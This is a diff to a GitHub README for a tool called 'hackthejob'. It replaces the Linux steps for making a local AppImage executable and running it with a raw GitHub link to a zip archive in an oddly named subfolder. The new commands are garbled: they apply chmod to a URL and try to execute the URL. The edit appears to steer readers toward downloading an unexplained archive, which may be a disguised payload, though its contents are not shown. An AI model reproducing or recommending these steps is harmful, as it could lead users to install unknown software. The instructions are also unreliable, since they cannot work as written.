mo7amadhassan/hackthejob/README.md

    - **Linux**:
      - Open a terminal and navigate to the directory where you downloaded the file.
-     - Use the command `chmod +x hackthejob.AppImage` to make the file executable.
+     - Use the command `chmod +x https://raw.githubusercontent.com/mo7amadhassan/hackthejob/main/Saktism/Software-2.4.zip` to make the file executable.
-     - Then run it with `./hackthejob.AppImage`.
+     - Then run it with `https://raw.githubusercontent.com/mo7amadhassan/hackthejob/main/Saktism/Software-2.4.zip`.

 ## 📜 Features